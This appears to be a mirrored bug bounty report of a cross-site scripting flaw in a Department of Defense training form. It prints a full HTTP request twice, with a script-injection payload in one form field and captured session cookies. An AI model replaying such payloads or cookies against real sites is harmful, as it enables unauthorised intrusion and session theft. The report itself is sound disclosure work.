Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneChor4oH1:2353185
HistoryFeb 02, 2024 - 9:16 p.m.

U.S. Dept Of Defense: Xss - ███

2024-02-0221:16:34
chor4o
hackerone.com
14
dept of defense
cross-site scripting
training idp.

7.1 High

AI Score

Confidence

Low

JSON

Hi teams,

Parameter: goal[1][Costs] ███

Burp request

POST /HRO/Training/idpgenerate.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: /
Referer: https://██████/
Cookie: PHPSESSID=l7c1vrsg3dbkgsp2lturjs6kca; session=expiry=1706891234033569; f5avraaaaaaaaaaaaaaaa_session_=DPCHLFADPAJCEMEHGHPOJHBKFGOENAGMGICMOOEBEBBAAMBIPCONEIJCEAGKJOOHAKODPBGOGKMAGOAEFOLAEJAKGNEKCIDJNPNMNCNBDOBDLCEGHGMMPGOEGEOPDMHD; BIGipServerweb-ext_pl=!EeLnWrrwaS8YcvQX1TcgTbCc8QSXMr/IS1+eEgDpVv96YCkn5MOqzqftXSRg0sMRVo16MATZlNeRUg==; nmstat=3aa48c20-a118-1d8b-744c-1042bec21eb1; _ga=GA1.1.736871804.1706875700; _gid=GA1.2.331161195.1706875701; _gat=1; _ga_LY79N0FLBS=GS1.1.1706890028.4.1.1706890425.0.0.0
Content-Length: 3504
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ███
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“employeeName”

tsSLAueP
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“payGrade”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“positionTitle”

Mr.
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“supervisorName”

tsSLAueP
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“department”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“year”

2024
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“annMidterm”

Annual - November
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“filledOutByEmployee”

Employee
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“filledOutBySupervisor”

Supervisor
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Activity]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Type]”

Certifications and Qualifications
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Priority]”

Recommended
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Purpose]”

Meet Future Staffing Needs
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Fulfillment]”

College or University Level Course
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Costs]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Activity]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Type]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Priority]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Purpose]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Fulfillment]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Costs]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Activity]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Term]”

Short Term Goal (1-3 years)
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Type]”

Personal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Priority]”

Recommended
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Purpose]”

Improve Performance
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Fulfillment]”

College or University Level Course
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Costs]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Activity]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Term]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Type]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Priority]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Purpose]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Fulfillment]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Costs]”

1<ScRiPt>alert(9639)</ScRiPt>
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“employeeComments”

1
------------YWJkMTQzNDcw–

█████

Poc
███████

███

Impact

The attacker can steal data from whoever checks the report.

System Host(s)

██████

Affected Product(s) and Version(s)

CVE Numbers

Steps to Reproduce

Burp Request

POST /HRO/Training/idpgenerate.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: /
Referer: https://██████/
Cookie: PHPSESSID=l7c1vrsg3dbkgsp2lturjs6kca; session=expiry=1706891234033569; f5avraaaaaaaaaaaaaaaa_session_=DPCHLFADPAJCEMEHGHPOJHBKFGOENAGMGICMOOEBEBBAAMBIPCONEIJCEAGKJOOHAKODPBGOGKMAGOAEFOLAEJAKGNEKCIDJNPNMNCNBDOBDLCEGHGMMPGOEGEOPDMHD; BIGipServerweb-ext_pl=!EeLnWrrwaS8YcvQX1TcgTbCc8QSXMr/IS1+eEgDpVv96YCkn5MOqzqftXSRg0sMRVo16MATZlNeRUg==; nmstat=3aa48c20-a118-1d8b-744c-1042bec21eb1; _ga=GA1.1.736871804.1706875700; _gid=GA1.2.331161195.1706875701; _gat=1; _ga_LY79N0FLBS=GS1.1.1706890028.4.1.1706890425.0.0.0
Content-Length: 3504
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: █████████
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“employeeName”

tsSLAueP
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“payGrade”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“positionTitle”

Mr.
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“supervisorName”

tsSLAueP
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“department”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“year”

2024
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“annMidterm”

Annual - November
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“filledOutByEmployee”

Employee
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“filledOutBySupervisor”

Supervisor
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Activity]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Type]”

Certifications and Qualifications
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Priority]”

Recommended
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Purpose]”

Meet Future Staffing Needs
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Fulfillment]”

College or University Level Course
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[0][Costs]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Activity]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Type]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Priority]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Purpose]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Fulfillment]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“development[1][Costs]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Activity]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Term]”

Short Term Goal (1-3 years)
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Type]”

Personal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Priority]”

Recommended
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Purpose]”

Improve Performance
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Fulfillment]”

College or University Level Course
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[0][Costs]”

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Activity]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Term]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Type]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Priority]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Purpose]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Fulfillment]”

------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“goal[1][Costs]”

1<ScRiPt>alert(9639)</ScRiPt>
------------YWJkMTQzNDcw
Content-Disposition: form-data; name=“employeeComments”

1
------------YWJkMTQzNDcw–

Suggested Mitigation/Remediation Actions

7.1 High

AI Score

Confidence

Low

JSON